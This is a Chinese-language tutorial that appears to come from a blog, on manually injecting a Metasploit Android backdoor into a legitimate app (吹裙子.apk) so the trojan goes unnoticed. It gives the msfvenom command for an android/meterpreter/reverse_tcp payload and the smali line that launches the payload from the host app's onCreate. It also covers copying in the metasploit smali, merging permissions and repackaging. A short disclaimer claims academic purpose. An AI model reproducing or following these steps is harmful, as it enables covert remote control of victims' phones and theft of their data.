安卓后门手动注入

#首先申明：随意修改别人软件是违法行为，本文只用于学术研究，不得用于非法用途，后果自负，与本人无关

     前面讲过kali如何生成apk木马渗透安卓，有个问题就是生成的软件无正常功能，且没有图标、单机没有任何反应，别人一看就知道是木马，当然也可以修改apk图标，我上次修改成qq图标了，思路是：先用Androidkiller反编译得到源代码，然后将源代码导入eclipse（或其他编程软件）重新添加软件图标再打包，而今天要讲的是将Payload后门注入到其他apk维持访问。自动注入工具kwetza自己百度，我只讲手动。

 大佬的自动注入文章：如何用kwetza给安卓应用加后门

软件需求：

      kali 2.0

     windows 7/10

     Androidkiller1.3.1  （吾爱破解链接：https://down.52pojie.cn/Tools/Android_Tools/AndroidKiller_v1.3.1.zip）

     吹裙子.apk            #我在vivo应用商店下载的  链接：https://pan.baidu.com/s/1hxp4mVghd0VpcGfvUWJ2JA  提取码：8ua4
     mm.apk                 #msfvenom生成的后门程序

环境需求：

     Windows配置好java（关键配置和环境变量），并安装Androidkiller

      kali2.0虚拟机实现

步骤1：#生成后门apk

     msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP  LPORT=监听端口号 -o mm.apk    

步骤2：下载正常apk应用或游戏

     可以自己找或者用我的吹裙子样本：链接：https://pan.baidu.com/s/1hxp4mVghd0VpcGfvUWJ2JA  提取码：8ua4

步骤3：利用Androidkiller反编译mm.apk  和  吹裙子.apk

      

步骤4： 查找入口点，并添加启动代码

     开始寻找吹裙子.apk文件的入口，在吹裙子.apk的Manifest.xml文件中查找Main和Launch关键词，定位到所对应的启动smail文件

搜索Main和Launch关键词

   

我们要找Welcome.smail,由于参数没显示具体路径，我们就用windows系统的文件搜索查找，右击smail->打开方式->打开文件路径

        

       

终于到关键时候了，我们要在吹裙子启动的activety中添加启动mm.apk的代码。

直接搜索onCreat函数，找到bundle对象，你并在下面添加启动payload代码：invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

     

点击保存之后呢，我们还要把刚才反编译的payload文件中的smail代码复制过来，把mm.apk 的smail/com/metasploit文件复制到吹裙子.apk的smail/com/目录下。 

 OK，现在基本已经大功告成了。直接保存退出就好了

步骤5：最后就是修改吹裙子.apk 的Manifest.xml中权限列表

将mm.apk的Manifest.xml中权限所有权限加到吹裙子apk的Manifest.xml中，不要有重复权限，意思就是权限是两个apk的合集，不嫌麻烦就一个个对。

   我说种快捷方法：利用linux 命令：cat file1 file2 | sort | uniq > file3  去除重复行得到他们的合集，将合集导入到吹裙子的xml中去。

     

 

步骤6： 打包程序

     

 测试